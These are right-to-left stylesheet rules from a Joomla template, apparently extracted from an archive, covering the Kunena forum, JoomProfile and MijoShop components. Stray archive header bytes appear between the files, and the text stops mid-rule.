#kunena.layout .navbar .mobile-user .dropdown-menu {
  background: #ffffff;
  border: 1px solid #eeeeee;
  padding: 20px;
  min-width: 270px;
  right: auto;
  left: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .form-group > div + div {
  margin-top: 10px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .input-group input {
  width: 100%;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .thumbnail {
  border: 1px solid #eeeeee;
  line-height: 50px;
  height: 50px;
  width: 50px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .thumbnail .glyphicon {
  font-size: 14px;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .fa-big {
  color: #666666;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu#userdropdownlogin .form-signin .list-unstyled li {
  font-size: 11px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu select,
#kunena.layout .navbar .mobile-user .dropdown-menu textarea,
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="text"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="password"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="datetime"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="datetime-local"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="date"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="month"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="time"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="week"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="number"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="email"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="url"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="search"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="tel"],
#kunena.layout .navbar .mobile-user .dropdown-menu input[type="color"],
#kunena.layout .navbar .mobile-user .dropdown-menu .inputbox {
  width: auto;
  display: inline-block;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .divider {
  background: #eeeeee;
  height: 1px;
  margin: 10px 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link {
  color: #666666;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:hover,
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:focus,
#kunena.layout .navbar .mobile-user .dropdown-menu .btn-link:active {
  color: #ff8800;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .kavatar {
  max-width: 60px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form label {
  border: 0;
  padding: 0;
  margin: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #status-form a.btn {
  border: 0;
  padding: 0;
  margin-bottom: 5px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu .fa {
  margin-left: 5px;
}
#kunena.layout .navbar .mobile-user .dropdown-menu a.btn {
  border: 0;
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #logout-form {
  padding: 0;
}
#kunena.layout .navbar .mobile-user .dropdown-menu #logout-form .btn {
  border: 0;
  margin: 0;
  padding: 0;
}
@media (max-width: 1199px) {
  #kunena.layout .navbar .mobile-user .dropdown-menu a[data-target="#statusTextModal"] {
    pointer-events: none;
  }
}
#kunena.layout .navbar .mobile-user .list-unstyled li + li {
  margin-top: 5px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu {
  right: auto;
  left: 0;
  width: 250px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a {
  color: #444444;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:hover,
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:focus,
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu a:active {
  color: #b35f00;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form {
  padding: 0 10px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form > div {
  border: 1px solid #eeeeee;
  border-radius: 3px;
  display: inline-block;
  margin-bottom: 5px;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu #status-form > div .btn {
  font-size: 12px;
  padding: 0 5px 2px;
  text-transform: none;
}
#kunena.layout .navbar .mobile-user #nav-menu.dropdown-menu .btn {
  padding-top: 0;
  padding-bottom: 0;
}
#kunena.layout #jumpto {
  margin-bottom: 20px;
}
#kunena.layout .table > thead > tr > th,
#kunena.layout .table > tbody > tr > th,
#kunena.layout .table > tfoot > tr > th,
#kunena.layout .table > thead > tr > td,
#kunena.layout .table > tbody > tr > td,
#kunena.layout .table > tfoot > tr > td {
  padding: 15px;
}
#kunena.layout .well {
  background: transparent;
  border: 1px solid #eeeeee;
  box-shadow: none;
}
#kunena.layout .topictitle {
  color: #222222;
  font-weight: 500;
  font-size: 16px;
}
#kunena.layout .topictitle:hover,
#kunena.layout .topictitle:focus,
#kunena.layout .topictitle:active {
  color: #ff8800;
}
#kunena.layout .started {
  color: #999999;
  font-size: 13px;
  margin-top: 3.33333333px;
}
#kunena.layout .container-fluid .col-md-9 {
  padding-left: 0;
}
#kunena.layout .modal {
  position: fixed;
}
#kunena.layout .table {
  border: 1px solid #eeeeee;
  float: none;
}
#kunena.layout .table .col-md-2 .col-md-3,
#kunena.layout .table .col-md-3 .col-md-3 {
  padding-left: 10px;
}
#kunena.layout .table .kavatar {
  background: #ffffff;
  border: 1px solid #eeeeee;
  display: block;
  padding: 3px;
}
#kunena.layout .table thead {
  background: #444444;
  color: #ffffff;
  font-size: 14px;
}
#kunena.layout .table thead .well {
  color: #444444;
}
#kunena.layout .table thead tr td {
  border: 0;
}
#kunena.layout .table thead tr td + td {
  border-right: 1px solid rgba(255, 255, 255, 0.2);
}
#kunena.layout .table tr td {
  border: 1px solid #eeeeee;
  float: none !important;
}
#kunena.layout .table tr td.col-md-5 {
  position: relative;
  min-height: 1px;
  padding-left: 20px;
  padding-right: 20px;
}
@media (min-width: 992px) {
  #kunena.layout .table tr td.col-md-5 {
    float: right;
    width: 33.33333333%;
  }
}
#kunena.layout .table tr td.col-md-2 + .col-md-2 {
  position: relative;
  min-height: 1px;
  padding-left: 20px;
  padding-right: 20px;
}
@media (min-width: 992px) {
  #kunena.layout .table tr td.col-md-2 + .col-md-2 {
    float: right;
    width: 25%;
  }
}
#kunena.layout .table td.hidden-xs > a {
  color: #999999;
}
#kunena.layout .table td.hidden-xs > a:hover,
#kunena.layout .table td.hidden-xs > a:focus,
#kunena.layout .table td.hidden-xs > a:active {
  color: #b35f00;
}
#kunena.layout tbody .col-md-2,
#kunena.layout tbody .col-md-3 {
  color: #666666;
  font-size: 13px;
}
#kunena.layout .btn {
  font-size: 12px;
  padding: 6.66666667px 10px;
  margin-top: 0;
  line-height: 1;
}
#kunena.layout .btn .caret {
  border-top-color: #ffffff;
}
#kunena.layout .btn-default {
  background: #ffffff;
  border: 1px solid #eeeeee;
  color: #666666;
}
#kunena.layout .btn-default .caret {
  border-top-color: #666666;
}
#kunena.layout .btn-default:hover,
#kunena.layout .btn-default:focus,
#kunena.layout .btn-default:active {
  background: #f7f7f7;
}
#kunena.layout .btn-group + .btn-group {
  margin-right: 5px;
}
#kunena.layout #btn_report {
  background: #ffffff;
  border: 1px solid #eeeeee;
  color: #666666;
  padding: 4px 10px;
}
#kunena.layout #btn_report .fa {
  color: #ff8800;
}
#kunena.layout #btn_report:hover,
#kunena.layout #btn_report:focus,
#kunena.layout #btn_report:active {
  border-color: #ff8800;
}
#kunena.layout .kfrontend {
  padding-top: 0;
  margin-bottom: 20px;
  padding-bottom: 0;
}
#kunena.layout .kfrontend:before,
#kunena.layout .kfrontend:after {
  display: table;
  content: " ";
}
#kunena.layout .kfrontend:after {
  clear: both;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa {
  background: transparent;
  border: 1px solid #999999;
  color: #999999;
  height: 28px;
  line-height: 22px;
  padding: 0;
  margin: 8px 0 0 12px;
  visibility: visible;
  text-align: center;
  width: 28px;
  opacity: 0.2;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:before {
  font-size: 24px;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:hover {
  opacity: 0.5;
}
#kunena.layout .kfrontend > .btn-toolbar .btn.fa:hover:before {
  color: #ffffff;
}
#kunena.layout .kfrontend h1,
#kunena.layout .kfrontend h2.btn-link {
  background-color: #444444;
  font-size: 17px;
  font-weight: 500;
  padding: 10px 20px;
  margin: 0;
}
#kunena.layout .kfrontend h1 a,
#kunena.layout .kfrontend h2.btn-link a {
  color: #ffffff;
}
#kunena.layout .kfrontend h1 a:hover,
#kunena.layout .kfrontend h2.btn-link a:hover,
#kunena.layout .kfrontend h1 a:focus,
#kunena.layout .kfrontend h2.btn-link a:focus,
#kunena.layout .kfrontend h1 a:active,
#kunena.layout .kfrontend h2.btn-link a:active {
  border-bottom: 0;
  text-decoration: none;
}
#kunena.layout .kfrontend h1:hover,
#kunena.layout .kfrontend h2.btn-link:hover {
  text-decoration: none;
}
#kunena.layout .kfrontend .row-fluid {
  margin-right: 0;
  margin-left: 0;
}
#kunena.layout .kfrontend .section {
  margin-bottom: 0;
}
#kunena.layout .kfrontend .section:before,
#kunena.layout .kfrontend .section:after {
  display: table;
  content: " ";
}
#kunena.layout .kfrontend .section:after {
  clear: both;
}
#kunena.layout .kfrontend .section table {
  border: 1px solid #eeeeee;
}
#kunena.layout .kfrontend .section table th,
#kunena.layout .kfrontend .section table td {
  border: 1px solid #eeeeee;
  padding: 10px 20px;
}
#kunena.layout .kfrontend .section table tr {
  background-color: #f7f7f7;
}
#kunena.layout .kfrontend .section table tr.category {
  background-color: #ffffff;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 {
  width: 8%;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 a {
  display: block;
  color: #999999;
}
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:hover,
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:focus,
#kunena.layout .kfrontend .section table tr.category .col-md-1 a:active {
  color: #b35f00;
}
@media (min-width: 992px) {
  #kunena.layout .kfrontend .section table tr.category .col-md-8 {
    width: 35%;
  }
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 {
  vertical-align: middle;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 {
  padding: 0;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 div {
  padding: 0;
}
#kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 .col-md-4 {
  padding-left: 10px;
  margin-top: 5px;
  width: 40px;
}
@media (min-width: 992px) {
  #kunena.layout .kfrontend .section table tr.category .col-md-3 .col-md-12 .col-md-8 {
    width: auto;
    max-width: 80%;
  }
}
#kunena.layout .kfrontend .section table tr.category:nth-child(2n+1) {
  background-color: #f7f7f7;
}
#kunena.layout .kfrontend .section table .well {
  background-color: transparent;
  box-shadow: none;
  border: 0;
  padding: 0;
}
#kunena.layout .kfrontend .section table .header-desc {
  margin-top: 10px;
  margin-bottom: 10px;
}
#kunena.layout .kfrontend .section table ul.list-inline {
  border-top: 1px solid #eeeeee;
  padding-top: 10px;
}
#kunena.layout .kfrontend .section table ul.list-inline li {
  margin-bottom: 5px;
}
#kunena.layout .kfrontend .section table ul.list-inline li a {
  color: #444444;
}
#kunena.layout .kfrontend .section table ul.list-inline li a i {
  color: #999999;
}
#kunena.layout .kfrontend .section table ul.list-inline li a:hover,
#kunena.layout .kfrontend .section table ul.list-inline li a:focus,
#kunena.layout .kfrontend .section table ul.list-inline li a:active {
  color: #b35f00;
}
#kunena.layout .kfrontend .section table ul.list-inline li a:hover i,
#kunena.layout .kfrontend .section table ul.list-inline li a:focus i,
#kunena.layout .kfrontend .section table ul.list-inline li a:active i {
  color: #b35f00;
}
#kunena.layout .kfrontend .section table ul.list-inline li i {
  margin-left: 5px;
}
#kunena.layout .kfrontend #kwho .well,
#kunena.layout .kfrontend #kstats .well {
  background-color: #ffffff;
  margin-bottom: 0;
  padding: 20px 0 0;
}
#kunena.layout .kfrontend #kwho .well i,
#kunena.layout .kfrontend #kstats .well i {
  margin-top: 0;
}
#kunena.layout .kfrontend #kwho .well .btn-link,
#kunena.layout .kfrontend #kstats .well .btn-link {
  color: #999999;
  text-align: right;
}
#kunena.layout .kfrontend #kwho .list-unstyled span + span {
  margin-right: 6.66666667px;
}
#kunena.layout .form-search .btn {
  padding: 0 20px;
  top: 0;
  height: 36px;
}
#kunena.layout .form-search .search {
  height: 36px;
}
#kunena.layout .form-search .search input {
  border-color: #cccccc;
  height: 36px;
  top: 0;
  padding: 0 10px;
  right: -11px;
}
#kunena.layout .form-search .search input:focus {
  border-color: #ff8800;
  box-shadow: none;
}
#kunena.layout #search .well {
  padding-top: 0;
}
#kunena.layout #search > .text-center {
  margin-bottom: 40px;
}
#kunena.layout #search #categorylist {
  margin-bottom: 10px;
}
#kunena.layout #search .row {
  margin: 0;
}
#kunena.layout #search .row > .col-md-6 {
  border: 1px solid #eeeeee;
  padding: 10px;
  margin-top: 20px;
}
@media (min-width: 992px) {
  #kunena.layout #search .row > .col-md-6 {
    margin-left: 20px;
    width: 46%;
  }
}
#kunena.layout #search .row > .col-md-6 fieldset {
  border: 0;
  padding: 0;
  margin: 0;
}
#kunena.layout #search .row > .col-md-6 select {
  width: 100%;
}
#kunena.layout #search .row > .col-md-6 select + select {
  margin-top: 10px;
}
#kunena.layout #search .row > .col-md-6 legend {
  margin-bottom: 4px;
  font-size: 14px;
  padding: 0 10px;
}
#kunena.layout #postform .column-item fieldset {
  border: 0;
  padding: 0;
}
@media (min-width: 992px) {
  #kunena.layout #postform .column-item fieldset .form-group {
    margin-right: 0;
    margin-left: 0;
  }
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item fieldset .form-group {
    margin-bottom: 10px;
  }
  #kunena.layout #postform .column-item fieldset .form-group label {
    margin-bottom: 5px;
    width: 100%;
  }
  #kunena.layout #postform .column-item fieldset .form-group #postcatid {
    margin-right: 0;
  }
}
#kunena.layout #postform .column-item fieldset .controls {
  margin-right: 107px;
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item fieldset .controls {
    padding-right: 20px;
    padding-left: 20px;
    margin-right: 0;
  }
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list:before,
#kunena.layout #postform .column-item fieldset #iconset_topic_list:after {
  display: table;
  content: " ";
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list:after {
  clear: both;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"] + label {
  border: 1px solid #eeeeee;
  border-radius: 3px;
  color: #999999;
  padding: 0;
  margin: 0 0 10px 10px;
  line-height: 40px;
  text-align: center;
  height: 40px;
  width: 40px;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"] + label .fa {
  font-size: 18px;
}
#kunena.layout #postform .column-item fieldset #iconset_topic_list input[type="radio"]:checked + label {
  background: transparent;
  border: 1px solid #ff8800;
  color: #ff8800;
  padding: 0;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor {
  border: 0;
  margin-bottom: 10px;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li {
  margin-left: 10px;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li a {
  border: 1px solid #eeeeee;
  color: #444444;
  padding: 5px 10px;
  line-height: 1;
}
#kunena.layout #postform .column-item fieldset #tabs_kunena_editor li.active a {
  background: #ff8800;
  border: 1px solid #ff8800;
  color: #ffffff;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader {
  background: #f7f7f7;
  border: 1px solid #eeeeee;
  padding: 10px;
  height: auto;
  margin-bottom: -1px;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:before,
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:after {
  display: table;
  content: " ";
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpHeader ul:after {
  clear: both;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpEditor {
  padding: 10px;
}
#kunena.layout #postform .column-item fieldset .markItUp .markItUpEditor:focus {
  box-shadow: none;
}
@media (max-width: 991px) {
  #kunena.layout #postform .column-item #kpost-attachments .control-label,
  #kunena.layout #postform .column-item #kpost-subscribe .control-label {
    display: block;
    float: none;
    text-align: right;
  }
  #kunena.layout #postform .column-item #kpost-attachments .controls,
  #kunena.layout #postform .column-item #kpost-subscribe .controls {
    padding-right: 0;
  }
  #kunena.layout #postform .column-item #kpost-attachments .string,
  #kunena.layout #postform .column-item #kpost-subscribe .string {
    display: inline;
  }
}
#kunena.layout #postform > div > div > div > fieldset > div > div {
  margin: 0;
}
#kunena.layout #postform > div > div > div > fieldset > div > div.modal-dialog {
  margin: 110px auto;
}
#kunena.layout #postform > div > div > div > fieldset > div > div.modal-dialog h3 {
  margin-top: 0;
}
#kunena.layout #postform > .center {
  margin-bottom: 20px;
}
#kunena.layout #postform #kattach_form .label-info {
  background: transparent;
  color: #444444;
  display: block;
  font-weight: 400;
  padding: 0;
  text-align: right;
  margin-bottom: 5px;
  white-space: normal;
}
#kunena.layout #postform #kattach_form > br {
  display: none;
}
#kunena.layout #files {
  margin-top: 20px;
}
#kunena.layout #files:before,
#kunena.layout #files:after {
  display: table;
  content: " ";
}
#kunena.layout #files:after {
  clear: both;
}
#kunena.layout #files > div {
  border: 1px dashed #eeeeee;
  display: inline-block;
  padding: 10px;
  margin-left: 5px;
  margin-bottom: 10px;
  float: right;
}
#kunena.layout #files > div .btn {
  display: block;
  padding: 5px;
  font-size: 11px;
  margin-top: 5px;
  width: 100%;
}
#kunena.layout #files > div .alert-error {
  background: transparent;
  border: 0;
  color: #ff8800;
  padding: 0;
  margin-bottom: 0;
  margin-top: 10px;
  max-width: 150px;
}
#kunena.layout #dropzone .dropzone .message {
  border: 2px dashed #eeeeee;
  color: #999999;
  margin: 0;
  padding: 20px;
  text-transform: uppercase;
}
@media (max-width: 991px) {
  .view-announcement #kunena.layout #adminForm {
    overflow-x: scroll;
    margin-bottom: 20px;
  }
}
#kunena.layout #editavatar {
  overflow-x: scroll;
}
#kunena.layout #KunenaUserEdit {
  margin-bottom: 20px;
}
#kunena.layout .tab-content tfoot .input-group-btn {
  text-align: left;
}
#kunena.layout .tab-content tfoot .input-group-btn select {
  float: none;
  margin-left: 5px !important;
}
.view-topic #kunena.layout > h1 {
  font-size: 16px;
}
.view-topic #kunena.layout > h1 .fa {
  font-size: 16px;
}
.view-topic #kunena.layout .message {
  border: 1px solid #eeeeee;
}
.view-topic #kunena.layout .message > div {
  padding: 20px 0;
}
.view-topic #kunena.layout .message > div.col-md-2 {
  border-left: 1px solid #eeeeee;
}
.view-topic #kunena.layout .message > div.col-md-10 {
  border-right: 1px solid #eeeeee;
  margin-right: -1px;
  padding-right: 20px;
  padding-left: 20px;
}
.view-topic #kunena.layout .message .modal {
  z-index: 100000;
}
.view-topic #kunena.layout .message .modal .modal-header h4 {
  margin-top: 0;
}
.view-topic #kunena.layout .message .message-published {
  border: 0;
  box-shadow: none;
  padding: 0;
  min-height: 0;
}
.view-topic #kunena.layout .message .message-published::after {
  display: none;
}
.view-topic #kunena.layout .message .message-published .pull-right.text-muted {
  display: block;
  float: none !important;
  text-align: left;
  margin-top: 10px;
}
.view-topic #kunena.layout .message .kmsg {
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
}
.view-topic #kunena.layout .message .kattach .thumbnails {
  padding: 0;
  margin: 0;
}
.view-topic #kunena.layout .message .kattach .thumbnails:before,
.view-topic #kunena.layout .message .kattach .thumbnails:after {
  display: table;
  content: " ";
}
.view-topic #kunena.layout .message .kattach .thumbnails:after {
  clear: both;
}
.view-topic #kunena.layout .message .kattach .thumbnails li {
  width: auto;
}
.view-topic #kunena.layout .message .kattach .thumbnails .btn-default {
  border: 0;
  padding: 0;
}
.view-topic #kunena.layout .message .col-md-2 {
  padding-right: 10px;
  padding-left: 10px;
}
.view-topic #kunena.layout .message .col-md-2 .topic-starter {
  border: 0;
}
.view-topic #kunena.layout .message .col-md-2 .profilebox li {
  display: block;
  margin-bottom: 6.66666667px;
}
.view-topic #kunena.layout .message .col-md-2 .profile-expand .btn-default {
  background: transparent;
  border: 1px solid #eeeeee;
  color: #666666;
  font-size: 11px;
}
.view-topic #kunena.layout .message .col-md-2 .profile-expand ul li {
  margin-top: 6.66666667px;
}
.view-topic #kunena.layout .message .qreplyform .panel-default {
  padding: 20px;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body {
  border: 0;
  padding-top: 0;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body .modal-header {
  padding: 0;
}
.view-topic #kunena.layout .message .qreplyform .panel-default .panel-body .modal-header h3 {
  margin-top: 0;
}
.view-topic #kunena.layout .message .qreplyform .wysibb-toolbar {
  min-height: 34px;
}
.view-user #kunena.layout h1 {
  margin-top: 0;
}
.view-user #kunena.layout .container {
  background: #f7f7f7;
  clear: both;
  padding-bottom: 20px;
  padding-top: 20px;
}
.view-user #kunena.layout .nav-tabs {
  border-bottom: 0;
  margin-bottom: 20px;
}
.view-user #kunena.layout .nav-tabs > li {
  margin-left: 5px;
  margin-bottom: 3.33333333px;
}
.view-user #kunena.layout .nav-tabs > li a {
  border: 1px solid #eeeeee;
  color: #666666;
  font-size: 11px;
  font-weight: 500;
  text-transform: uppercase;
  padding: 5px 10px;
}
.view-user #kunena.layout .nav-tabs > li a:hover,
.view-user #kunena.layout .nav-tabs > li a:focus,
.view-user #kunena.layout .nav-tabs > li a:active {
  border-color: #ff8800;
  color: #ff8800;
}
.view-user #kunena.layout .nav-tabs > li.active a {
  background: #ff8800;
  border-color: #ff8800;
  color: #ffffff;
}
#kunena.layout .jssocials-share-link {
  box-shadow: none;
  font-size: 10px;
  padding: 4px 6px;
}
#kunena.layout .breadcrumb {
  background-color: #f7f7f7;
  border: 1px solid #eeeeee;
  padding: 10px 10px;
}
#kunena.layout .breadcrumb .divider {
  display: none;
}
#kunena.layout ul.pagination {
  border: 1px solid #eeeeee;
  margin: 0 0 20px;
}
#kunena.layout ul.pagination:before,
#kunena.layout ul.pagination:after {
  display: table;
  content: " ";
}
#kunena.layout ul.pagination:after {
  clear: both;
}
#kunena.layout ul.pagination li {
  display: block;
  float: right;
}
#kunena.layout ul.pagination li + li {
  border-right: 1px solid #eeeeee;
}
#kunena.layout ul.pagination li a {
  border: 0;
  display: inline-block;
  float: none;
  font-size: 14px;
  font-weight: 400;
  margin: -1px;
  padding: 5px 15px;
}
#kunena.layout ul.pagination li a.disabled {
  filter: alpha(opacity=40);
  opacity: 0.4;
}
input#ksearch-keywords {
  width: 100%;
}
.klatest .klatest-items li {
  border: 0;
}
.klatest .klatest-items .klatest-item {
  margin-top: 10px;
}
.klatest .klatest-items .klatest-item .klatest-subject {
  padding-top: 0;
}
div.kstats-module ul.kstats-items li {
  padding: 10px;
}
#kunena.layout #kuserlist-form .label {
  border-radius: 3px;
}
#kunena.layout #kuserlist-form .label.label-default,
#kunena.layout #kuserlist-form .label.label-success,
#kunena.layout #kuserlist-form .label.label-warning,
#kunena.layout #kuserlist-form .label.label-error {
  color: #ffffff;
}
#kunena.layout #adminForm table.table {
  margin-top: 20px;
}
#kunena.layout .input-group-btn .btn {
  margin-right: 10px;
  min-height: 20px;
  line-height: 20px;
}
#kunena.layout #ann-date .input-group-addon,
#kunena.layout #ann-date2 .input-group-addon,
#kunena.layout #ann-date3 .input-group-addon {
  display: inline-block;
  height: 34px;
  line-height: 24px;
}
.com_kunena .datepicker-dropdown {
  background: #ffffff;
  border-color: #d5d5d5;
  padding: 10px;
}
.view-topic body.modal-open {
  overflow: auto;
}
.com_kunena #t3-mainnav {
  padding: 0;
}
.com_kunena #t3-mainnav .t3-navbar {
  display: inline-block;
  flex: 1;
}
.com_kunena .t3-megamenu .navbar-nav {
  flex-direction: row;
}
.com_kunena .t3-megamenu .navbar-nav .dropdown-menu {
  position: absolute;
}
.com_kunena .t3-megamenu .navbar-nav .dropdown-toggle::after {
  display: none;
}
.com_kunena .tab-pane.show {
  opacity: 1;
}PKӜ�\+e���4purity_iii/css/rtl/orange/extras/com_joomprofile.cssnu&1i�.com_joomprofile #f90pro .f90pro-wrapper .f90pro-avtar img {
  width: 100%;
}
.com_joomprofile #f90pro .f90pro-wrapper #f90pro-detail .f90pro-left h3 {
  font-size: 18px;
  line-height: 1.5;
}PKӜ�\h�E�QQ1purity_iii/css/rtl/orange/extras/com_mijoshop.cssnu&1i�.com_mijoshop .common-home #content_oc h1,
.com_mijoshop .common-home #content_oc h2 {
  font-size: 24px;
}
.com_mijoshop .box_oc .box-product {
  margin-right: 0;
  padding: 20px;
}
.com_mijoshop .box_oc .box-product > div {
  float: right;
  margin: 0;
  margin-left: 20px;
  width: 100%;
}
.com_mijoshop .box_oc .box-product > div .image {
  display: inline-block;
  border: 1px solid #eeeeee;
  padding: 5px;
  text-align: right;
}
.com_mijoshop .box_oc .box-product > div .image a {
  display: inline-block;
}
.com_mijoshop .box_oc .box-product > div .image img {
  border: 0;
  padding: 0;
}
.com_mijoshop .box_oc .box-product > div .name {
  padding: 10px 0;
  text-align: right;
}
.com_mijoshop .box_oc .box-product > div .price {
  margin: 10px 0;
}
.com_mijoshop .box_oc #tab-related .box-product > div {
  width: auto;
}
.com_mijoshop .box_oc .box-content .content_oc p * {
  margin: 10px 0 10px 10px;
}
.com_mijoshop #header_oc {
  margin: 0 0 20px;
  padding: 0;
}
.com_mijoshop #header_oc #currency {
  top: 0;
}
.com_mijoshop #header_oc #currency a {
  margin-top: 5px;
}
.com_mijoshop #header_oc #cart {
  border-right: 1px solid #eeeeee;
  margin-right: 20px;
  top: 5px;
}
.com_mijoshop #header_oc #cart .heading {
  margin-top: 0;
}
.com_mijoshop #header_oc #search_oc {
  top: 10px;
  width: 120px;
}
.com_mijoshop #header_oc #search_oc input[type="text"] {
  border-radius: 0;
  height: 25px;
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
.com_mijoshop #header_oc .links {
  bottom: 0;
  top: auto;
}
.com_mijoshop #currency .dropdown-menu > li,
.com_mijoshop #top-links .dropdown-menu > li {
  border-color: #eeeeee;
}
.com_mijoshop #currency .dropdown-menu > li a:hover,
.com_mijoshop #top-links .dropdown-menu > li a:hover,
.com_mijoshop #currency .dropdown-menu > li a:focus,
.com_mijoshop #top-links .dropdown-menu > li a:focus {
  color: #ffffff;
}
.com_mijoshop #currency .open a,
.com_mijoshop #top-links .open a {
  color: #444444;
}
.com_mijoshop .mijoshop .product-thumb .image img {
  max-width: 100%;
  width: 100%;
}
.com_mijoshop .mijoshop .product-thumb .caption {
  padding: 15px !important;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 {
  margin: 0 0 10px;
  font-size: 15px;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 a {
  color: #444444;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 a:hover,
.com_mijoshop .mijoshop .product-thumb .caption h4 a:focus {
  color: #ff8800;
}
.com_mijoshop .mijoshop .product-thumb .caption .price {
  font-weight: 700;
  color: #ff8800;
  margin-top: 10px !important;
}
.com_mijoshop .mijoshop .product-thumb .caption .price .price-tax {
  color: #999999;
  font-weight: 400;
}
.com_mijoshop #content_oc > h2 {
  margin-bottom: 30px;
  font-size: 24px;
}
.com_mijoshop #content_oc > p {
  padding: 10px 20px;
  border: 1px solid #eeeeee;
  margin-bottom: 20px !important;
  margin-top: 10px !important;
}
.com_mijoshop #content_oc .product-filter {
  padding-bottom: 10px;
}
.com_mijoshop #content_oc .product-filter .display {
  padding-top: 15px;
}
.com_mijoshop #content_oc .product-grid .product-thumb .caption {
  min-height: 200px !important;
}
.com_mijoshop #content_oc .product-list .product-thumb .image {
  padding: 0 0 0 20px;
  height: 200px;
}
.com_mijoshop #content_oc .product-list .product-thumb .image > a {
  height: 100%;
}
.com_mijoshop #content_oc .product-list .product-thumb .image img {
  max-width: 100%;
  max-height: 100%;
}
.com_mijoshop #content_oc .product-list .product-thumb .caption {
  overflow: hidden;
  margin: 0;
  padding: 20px 0 20px 20px !important;
  min-height: 161px !important;
}
.com_mijoshop .product-info .left {
  width: 30% !important;
}
.com_mijoshop .product-info .right {
  min-height: 352px;
  width: 65% !important;
}
.com_mijoshop .product-info .right .description {
  border-top: 0;
  padding: 0 0 10px;
}
.com_mijoshop .product-info .left .cart div input[type="text"],
.com_mijoshop .product-info .left .cart div input[type="button"] {
  display: inline-block;
}
.com_mijoshop .product-info .left .cart div input[type="text"] {
  padding-right: 5px;
  padding-left: 5px;
}
.com_mijoshop .product-info .right .cart div span {
  color: #999999;
}
.com_mijoshop #tab-description,
.com_mijoshop #tab-review {
  padding: 20px;
}
.com_mijoshop .content_oc ul {
  list-style: none;
  margin: 0;
  padding: 0;
}
.com_mijoshop .cart-info .quantity input[type='text'] {
  -webkit-box-sizing: content-box;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
  height: 28px;
  padding-top: 0;
  padding-bottom: 0;
}
.com_mijoshop .cart-module #coupon input,
.com_mijoshop .cart-module #voucher input {
  display: inline-block;
}
.com_mijoshop .cart-module #shipping table {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
}
.com_mijoshop .cart-module #shipping table td {
  padding: 10px 20px;
}
.com_mijoshop .box-category ul li {
